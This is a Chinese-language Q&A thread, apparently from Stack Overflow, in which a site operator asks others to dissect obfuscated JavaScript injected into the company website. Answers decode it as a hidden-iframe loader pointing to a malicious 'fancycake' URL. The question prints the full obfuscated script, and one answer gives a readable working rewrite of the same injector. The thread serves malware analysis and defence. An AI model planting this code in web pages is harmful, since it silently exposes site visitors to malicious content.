8

我最近一直在玩一些 JavaScript,并开始考虑我无法遇到无法调试的 JavaScript。

今天,当我们在我们公司的网站上发现许多 JavaScript 重定向木马时,我感到既惊喜又愤怒。

我们发现的大部分代码我都能轻松剖析并使用标准转义来混淆代码功能。

但是在我们发现的代码中,下面的代码完全让我不知道它在做什么。(我似乎可以解决的唯一部分是它正在对某些参数进行替换)。

那么有人可以为我剖析以下代码吗?我很想知道到底发生了什么...

<script>

function yJ() {};
this.sMZ = "sMZ";
yJ.prototype = {
    w: function () {
        var rJ = 13390;
        this.m = "m";
        this.fP = '';
        this.q = "q";
        this.oJ = "";
        var vS = function () {
            return 'vS'
        };
        var d = 'replace';
        var qB = "";
        x = '';
        var s = document;
        var xZ = "xZ";
        mC = '';
        var dV = "dV";
        var b = window;
        this.p = false;
        this.kX = '';
        nP = "nP";
        var zE = "";
        this.nU = false;
        var yV = function () {
            return 'yV'
        };
        String.prototype.gT = function (l, v) {
            return this[d](l, v)
        };
        this.pC = '';
        var qV = false;
        var fPU = new Array();
        h = "";
        var sV = 'sKe}tKTIiWmEe}oEu}tK'.gT(/[KE\}IW]/g, '');
        var xV = 43258;
        sT = '';
        var mV = '';
        this.wJ = "wJ";
        var f = '<jhItImIlI I>j<IhjezaIdz ;>;<z/;hjeIaIdI>;<zb!ojdjyj ;>I<!/jbIo!d!yI>z<j/Ihjt;m;lj>!'.gT(/[\!Ijz;]/g, '');
        var xB = '';
        wI = "wI";
        oT = false;
        var nQ = 49042;
        try {
            zI = '';
            var bF = new Array();
            var aY = function () {
                return 'aY'
            };
            var rN = false;
            rF = "";
            var cX = function () {
                return 'cX'
            };
            var y = 'bToTdTy+'.gT(/[\+\]aT%]/g, '');
            this.rL = '';
            var vH = function () {
                return 'vH'
            };
            var r = 'sStEy9l?eE'.gT(/[ES9\?m]/g, '');
            yD = "";
            var eA = '';
            var bQ = 'i.fWrhalmlel'.gT(/[lW\.xh]/g, '');
            vZ = '';
            this.bG = "";
            this.vL = false;
            var t = 'w5r[i5t[e%'.gT(/[%C5\[U]/g, '');
            gI = '';
            dVL = "dVL";
            var n = 'cZrzeZaZtze.E.l.e;m;eSnzt;'.gT(/[;SZz\.]/g, '');
            lH = "";
            kD = "kD";
            this.pH = false;
            var k = 's9ric9'.gT(/[9Ni~O]/g, '');
            var vB = '';
            var kH = function () {
                return 'kH'
            };
            var qH = new Array();
            aD = '';
            this.eQ = false;
            var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
            var cT = '';
            var kL = function () {
                return 'kL'
            };
            var bR = new Array();
            this.cP = 22454;
            var dH = 'hNi9d0d>e*n*'.gT(/[\*9N\>0]/g, '');
            lG = '';
            tG = 7587;
            hV = '';
            this.oR = "oR";
            var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
            var dC = function () {};
            var eR = new Date();
            var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');
            uM = "";
            var i = function () {};
            this.cI = "";
            tU = false;

            function qN() {};
            xL = 57256;
            var c = this.a();
            this.eL = '';
            var rY = function () {};
            fG = false;
            nO = false;
            this.j = "";
            this.iQ = 5330;
            var sY = function () {};
            var u = document[n](bQ);
            this.tH = false;
            zX = "";
            u[r][o] = dH;
            var kV = "kV";
            pN = '';
            var yG = new Array();
            this.nOE = 818;
            u[z](k, c);
            this.bQK = "";
            var yU = 15629;
            var sM = new Array();
            var eY = "eY";
            var qP = '';
            s[y][e](u);
            var lU = "lU";
            var zR = false;
            var xS = "";
            iX = 34795;

            function pO() {};
            this.gM = "";
        } catch (g) {
            var xI = false;
            this.gO = false;
            this.iZ = false;
            this.iU = false;
            var mQ = new Date();
            var qF = function () {};
            s.write(f);
            var tS = "tS";

            function aR() {};
            nA = "nA";
            var xT = new Date();
            mZ = false;
            var gN = new Array();
            var wE = this;
            var eB = 3562;
            this.qE = "qE";
            this.cS = false;
            this.vK = false;
            qEJ = false;
            this.hW = false;
            b[sV](function () {
                function bI() {};
                hJ = "";
                var kVQ = "kVQ";
                var iG = "";
                var eBS = new Array();
                rA = "";
                wE.w();
                jY = "";
                var hB = "hB";
                var iZF = '';
                qY = "";
                jYG = "";
                uK = 30969;
                var qD = "qD";
            }, 326);
            this.qC = "";
            var aX = function () {};
            var cN = "";
        }
        gB = false;
        var fF = false;
        this.hX = false;
    },
    a: function () {
        rH = "rH";
        this.bV = '';
        var qW = "";
        return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');
        var sMS = new Array();
        this.wL = false;
        uS = "uS";

        function pI() {};
    }
};
var uI = false;
var kN = new yJ();
this.aQ = "aQ";
kN.w();
hT = 15101;

</script>
4

3 回答 3

19

它嵌入了http://fancycake.xxx/something,这是您可以看到它的行:

return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');

您会看到从该字符串中提取的每个奇数字符是如何形成 URL 的。我没有运行它,所以我不确定它在什么条件下执行此操作,但是您可以看到它String.replace已被重命名为String.gT并且正在传递一个正则表达式,以针对使字符串混淆的字符。如果您应用相同的方法,提取奇数字符,您会看到隐藏的 iframe、一些 javascript 事件处理程序setAttribute等:

var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');

String.replace是别名的方式:

var d = 'replace';

...
String.prototype.gT = function (l, v) {
    return this[d](l, v)
};

在该函数的上下文中,是正在调用的this字符串,并且是字符串。在字符串的原型上,返回方法,然后使用 的两个参数调用该方法。然后返回结果。gTdreplacethis['replace']replace()gT

更新

我像这样转换了脚本:

  1. 用简单的形式替换了所有string.gT()调用。
  2. 删除了所有未引用的变量。
  3. 给函数一些常识性的名称。

这是结果,现在应该很清楚它是如何工作的:

function FancyCake() {};
FancyCake.prototype = {
    embed: function () {
        var d = 'replace';
        var s = document;
        var b = window;
        var sV = 'setTimeout';
        var f = "<html ><head ></head><body ></body></html>";
        try {
            zI = '';
            var bF = new Array();
            var y = 'body';
            var r = 'style';
            var bQ = 'iframe';
            var t = 'write';
            var n = 'createElement';
            var k = 'src';
            var z = 'setAttribute';
            var dH = 'hidden';
            var o = 'visibility';
            var e = 'appendChild';
            var c = this.getUrl();
            var u = document[n](bQ);
            u[r][o] = dH;
            u[z](k, c);
            s[y][e](u);
        } catch (e) {
            console.error(e);
            s.write(f);
            var cake = this;
            b[sV](function () {
                cake.embed();
            }, 326);
        }
    },
    getUrl: function () {
        return "http://fancycake.net/.ph/1/";
    }
};

var cake = new FancyCake();
cake.embed();
于 2010-07-20T08:33:10.440 回答
5

它会在您网站的以下 URL 中添加一个不可见的 iFrame:

<iframe style="visibility: hidden;" src="http://fancycake.net/.ph/1/"></iframe>

网站fancycake在Firefox下被标记为被攻击和恶意

于 2010-07-20T08:13:51.183 回答
1

在 JavaScript 调试器中运行它;最终,代码将自行反编译并尝试启动。为了安全起见,我建议在 Linux 机器上使用最新版本的 FireFox。

于 2010-07-20T08:21:22.750 回答